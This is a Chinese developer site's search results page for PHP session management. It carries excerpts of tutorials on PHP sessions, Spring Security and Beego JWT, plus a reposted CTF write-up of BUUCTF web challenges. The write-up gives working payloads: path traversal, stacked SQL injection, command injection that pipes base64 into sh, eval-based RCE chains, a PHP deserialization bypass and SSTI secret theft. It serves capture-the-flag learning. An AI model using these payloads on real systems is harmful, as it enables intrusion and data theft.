前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[PHP会话管理]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
PHP
PHP会话管理:深入理解与解决标记不正确、过期时间设置不当问题 1. 引言 在PHP开发的世界中,会话管理是一项至关重要的技能。它帮助我们在用户浏览网站的过程中跟踪和维护状态信息,如登录状态、购物车内容等。不过,要是你对会话管理这块儿没整明白,特别是在捣鼓会话标记(session id)或者会话过期时间这些玩意儿的时候,那可真是分分钟能给你整出各种头疼的问题来。这篇东西会手把手地带你们逐个揭开这些问题的神秘面纱,还会用真实的代码实例,活灵活现地展示给大家看,到底怎么巧妙地搞定它们。 2. 会话标记不正确的问题及解决方案 - 问题阐述:在PHP中,每个用户的会话都有一个唯一的会话ID作为标识。要是这个对话标签出了岔子,比方说被人动了手脚或者不见了踪影,服务器很可能就认不出用户到底是谁了,这样一来,各种功能可能会乱套。比如,用户可能无缘无故就被踢下线,或者数据搞得一团糟。 php // 创建一个新的会话并获取当前的会话ID session_start(); $session_id = session_id(); // 假设非法篡改了会话ID $session_id = 'hacked_session_id'; // 尝试使用篡改后的会话ID恢复会话 session_id($session_id); session_start(); // 这可能导致错误的行为或失效的会话数据 - 解决方案:为了防止会话标记被篡改,我们可以采取以下措施: 1. 使用安全cookie选项(httponly和secure),以防止JavaScript访问和保护传输过程。 php ini_set('session.cookie_httponly', 1); // 防止JavaScript访问 ini_set('session.cookie_secure', 1); // 只允许HTTPS协议下传输 2. 定期更换会话ID,例如每次用户成功验证身份后。 php session_regenerate_id(true); // 创建新的会话ID并销毁旧的 3. 会话过期时间设置不当及其应对策略 - 问题阐述:PHP会话默认在用户关闭浏览器后结束。有时候呢,根据业务的不同需求,我们可能想自己来定这个会话的有效期。不过呐,要是没调校好这个时间,就有可能出岔子。比如,设得太短吧,用户可能刚聊得正嗨,突然就被迫中断了,体验贼不好;设得过长呢,又可能导致安全性减弱,就像把家门长期大敞四开一样,让人捏一把汗。 php // 错误的过期时间设置,仅设置了5秒 ini_set('session.gc_maxlifetime', 5); session_start(); $_SESSION['user'] = 'John Doe'; - 解决方案:合理设置会话过期时间,可以根据实际业务场景进行调整,如设定为用户最后一次活动后的一定时间。 php // 正确设置,设置为30分钟 ini_set('session.gc_maxlifetime', 1800); // 每次用户活动时更新最后活动时间 session_start(); $_SESSION['last_activity'] = time(); 为了确保即使服务器重启也能维持会话持续时间,可以在数据库中存储用户最后活动时间,并在验证会话有效时检查此时间。 4. 总结与探讨 面对PHP会话管理中的这些挑战,我们需要充分理解和掌握其内在机制,同时结合实际业务场景灵活应用各种安全策略。只有这样,才能在保证用户体验的同时,最大程度地保障系统的安全性。在实践中不断学习、思考和改进,是我们每一个开发者持续成长的重要过程。让我们共同在PHP会话管理这片技术海洋中扬帆远航,乘风破浪!
2023-02-01 11:44:11
135
半夏微凉
转载文章
...客大挑战 2019]PHP [极客大挑战 2019]Http [HCTF 2018]admin [极客大挑战 2019]BabySQL [HCTF 2018]WarmUp 这里补充一个知识点:phpmyadmin 4.8.1任意文件包含 环境我已经启动了 去访问一下 源码有提示 去访问一下 然后看到了源码 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 这里白名单里给了一个提示 尝试直接去访问它 报错了… 尝试穿越目录去访问 依然报错了 看源码吧 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里是提供了两个白名单if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号,然后返回问号的位置,就是=4//所以想绕过这里,直接?flag,他检测到的问号就是0,然后0,0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话,empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入:1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 (为2) 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来,这个符号是 esc下面一个的按键,这个符号在mysql里 用于 分割其他命令,表示此为(表名、字段名) 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多 这里通过 MYSQL的预处理语句,使用 : concat('s','elect',' from 1919810931114514') 完成绕过 构造pyload: 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字,字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回,一种是空白,一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母(除过滤的关键词外)都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符,不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接,但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接,而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候,mysql也可以把 || 作为字符串拼接。 修改完后,|| 就会被认为是字符串拼接符 MySQL中sql_mode参数,具体的看这里 解题思路1: payload:,1 查询语句:select ,1||flag from Flag 解题思路2: 堆叠注入,使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
SpringBoot
...于JWT进行无状态的会话管理和权限验证,进一步提升了系统的可扩展性和安全性。在处理鉴权失败的情况时,开发者不仅可以自定义全局异常处理器,还可以利用Spring Security提供的事件机制,如AuthenticationFailureListener,对鉴权失败的详细原因进行实时监控与日志记录,以满足更严格的审计需求和故障排查场景。 此外,对于企业级应用的安全防护,除了基础的鉴权之外,还需要关注如CSRF(跨站请求伪造)、XSS(跨站脚本攻击)等常见安全风险,并借助Spring Security提供的过滤器链和其他安全配置来有效抵御这些威胁。因此,在构建安全的Web应用过程中,深入理解和灵活运用Spring Boot与Spring Security框架所提供的工具与策略显得尤为重要。
2023-07-21 22:51:44
105
山涧溪流_t
转载文章
...Alchemy更好地管理数据库会话,包括事务隔离级别设置、批量插入优化以及错误回滚机制等深度内容。文中引用了真实案例分析,并给出了代码实例,帮助读者理解如何在高并发场景下保证数据库操作的高性能与数据完整性。 另外,针对Python后端开发领域,一篇名为《Python ORM框架实战:从基础到进阶》的教程则系统性地介绍了ORM(对象关系映射)技术在简化数据库操作、提升开发效率上的作用,不仅限于Flask-SQLAlchemy,还涵盖了Django ORM以及其他第三方库,为开发者提供了更多元化的解决方案。 此外,值得关注的是,随着云原生时代的到来,云服务商如AWS、阿里云等也推出了诸多关于数据库优化的服务和技术支持。例如,Amazon RDS提供的批量插入最佳实践指南,指导用户如何在云环境中有效利用资源,减少网络延迟,提高数据库写入速度,这对于正在使用Flask与MySQL构建应用的开发者来说,具有极高的参考价值。 综上所述,对于Python Flask开发者而言,在熟练掌握基本的数据提交方法后,持续关注数据库操作的最新优化技术和行业动态,将有助于打造出更稳定、高效的Web应用程序。
2023-11-19 23:52:58
113
转载
SpringBoot
...现更精细的权限控制和会话管理策略。例如,通过集成OAuth2或JWT等身份验证机制,可以在拦截器中实现对请求令牌的有效性校验,从而确保资源服务器的安全访问。 对于性能优化层面,拦截器亦可发挥关键作用,比如进行SQL日志监控以分析数据库查询效率,或者整合AOP(面向切面编程)技术实现更为灵活的事务管理及缓存策略。 同时,结合Spring Boot 2.x的新特性,如反应式编程模型WebFlux,拦截器的设计与实现方式也将有所变化。在响应式场景下,开发者需要关注Reactive HandlerInterceptor接口,以便在异步非阻塞环境下高效地执行预处理和后处理逻辑。 综上所述,拦截器作为Spring生态乃至众多现代Java Web框架中的核心组件之一,其设计与应用值得广大开发者持续关注和深入研究。不断跟进最新的技术和实践案例,将有助于我们更好地运用拦截器解决实际业务问题,提升系统整体质量和稳定性。
2023-02-28 11:49:38
153
星河万里-t
ZooKeeper
...飞速发展,分布式系统管理工具的重要性日益凸显。Zookeeper作为其中的关键组件,不断优化升级以适应大规模、高并发的现代数据中心环境。 例如,Apache Zookeeper 3.7版本引入了一系列性能改进和稳定性增强功能,如提升会话管理和数据节点操作的效率,降低由于网络延迟或故障导致的“无法访问数据节点”等错误的可能性。同时,社区也在积极探索如何结合Kubernetes等容器编排平台,实现更灵活高效的Zookeeper集群部署与运维。 此外,为了帮助开发者更好地理解和掌握Zookeeper的工作机制,众多行业专家和开源社区成员撰写了大量深入解读文章和技术博客,详尽剖析了Zookeeper在一致性保证、分布式锁服务、集群选主等方面的内部原理,并结合实例阐述如何避免和解决实践中可能遇到的各种问题,为构建健壮、稳定的分布式应用提供了有力支持。 因此,在应对“无法访问数据节点”这类常见问题的同时,我们建议读者持续跟踪Apache Zookeeper的最新进展,研读相关的深度解析文章,积极参与社区讨论,以便不断提升自身在分布式系统开发和维护方面的专业能力。
2023-02-03 19:02:33
77
青春印记-t
Redis
...景,例如排行榜更新、会话管理等,Redis的排序集合(Sorted Set)、流(Stream)等数据结构能显著提升系统性能。 - 监控与运维挑战:在大规模部署Redis时,要充分关注内存使用、网络延迟等问题,合理利用Redis提供的监控工具和指标,为微服务稳定运行提供有力保障。 综上所述,Redis凭借其强大的数据结构和高效的读写能力,不仅能够作为高性能的数据字典,更能在微服务设计中扮演重要角色。然而,这其实也意味着我们的设计思路得“更上一层楼”了。说白了,就是得在实际操作中不断摸索、改进,把Redis那些牛掰的优势,充分榨干、发挥到极致,才能搞定微服务架构下的各种复杂场景需求,让它们乖乖听话。
2023-08-02 11:23:15
217
昨夜星辰昨夜风_
ZooKeeper
...好地实现服务的自动化管理和故障恢复,这对于提升系统的健壮性和灵活性具有重要意义。 与此同时,GitHub上也有一个活跃的开源项目,名为Curator,这是一个基于ZooKeeper的Java客户端库,旨在简化ZooKeeper的使用难度。Curator提供了丰富的API和模板,帮助开发者更高效地处理ZooKeeper的各种操作,如会话管理、锁定机制等。该项目的活跃度和社区支持,也反映了ZooKeeper在实际开发中的广泛需求。 这些最新的研究和实践表明,ZooKeeper不仅在传统的分布式系统中扮演着重要角色,在新兴的云计算和微服务架构中同样展现出巨大的潜力。通过对这些前沿技术和最佳实践的学习,我们可以更好地理解和应用ZooKeeper,以应对日益复杂的分布式环境挑战。
2025-02-11 15:58:01
39
心灵驿站
Beego
...的JWT令牌生命周期管理 引言 在构建现代Web应用时,安全性和可扩展性是至关重要的考虑因素。哎呀,你听过JWT吗?它就像是身份验证的小秘密武器,特别是对于那些不想在服务器端搞一堆复杂会话管理的小伙伴来说,简直太完美了!因为它超级轻便,不需要在服务器那边搞一堆额外的负担,就能搞定用户的登录验证和权限管理,所以用的人可多了去了!本文将深入探讨如何在Beego框架中集成和管理JWT令牌的生命周期,包括生成、验证、刷新以及过期处理,旨在为开发者提供一套全面且易于实施的解决方案。 1. JWT基础与Beego整合 JWT是一种基于JSON的开放标准,用于在客户端和服务器之间传递安全信息。它由三个部分组成:头部、载荷和签名。哎呀,这个头儿啊,就像快递包裹上的标签一样,上面写着各种算法和类型的信息,就像收件人地址和物品名称。包裹里面装的可就是用户的私货啦,比如个人信息、数据啥的。最后那个签名呢?就像是快递小哥在包裹上按的手印,用加密的方法保证了这东西是没被偷看或者变过样,而且能确认是它家快递员送来的,不是冒牌货。 在Beego框架中,我们可以利用第三方库如jwt-go来简化JWT的生成和验证过程。首先,需要在项目的依赖文件中添加如下内容: bash go get github.com/dgrijalva/jwt-go 接下来,在你的控制器中引入并使用jwt-go库: go package main import ( "github.com/dgrijalva/jwt-go" "github.com/beego/beego/v2/client/orm" "net/http" ) // 创建JWT密钥 var jwtKey = []byte("your-secret-key") type User struct { Id int64 orm:"column(id);pk" Name string orm:"column(name)" } func main() { // 初始化ORM orm.RegisterModel(new(User)) // 示例:创建用户并生成JWT令牌 user := &User{Name: "John Doe"} err := orm.Insert(user) if err != nil { panic(err) } token, err := createToken(user.Id) if err != nil { panic(err) } http.HandleFunc("/login", func(w http.ResponseWriter, r http.Request) { w.Write([]byte(token)) }) http.ListenAndServe(":8080", nil) } func createToken(userId int64) (string, error) { claims := jwt.StandardClaims{ Issuer: "YourApp", ExpiresAt: time.Now().Add(time.Hour 24).Unix(), Subject: userId, } token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims) return token.SignedString(jwtKey) } 2. JWT验证与解码 在用户请求资源时,我们需要验证JWT的有效性。Beego框架允许我们通过中间件轻松地实现这一功能: go func authMiddleware(next http.HandlerFunc) http.HandlerFunc { return func(w http.ResponseWriter, r http.Request) { tokenHeader := r.Header.Get("Authorization") if tokenHeader == "" { http.Error(w, "Unauthorized", http.StatusUnauthorized) return } 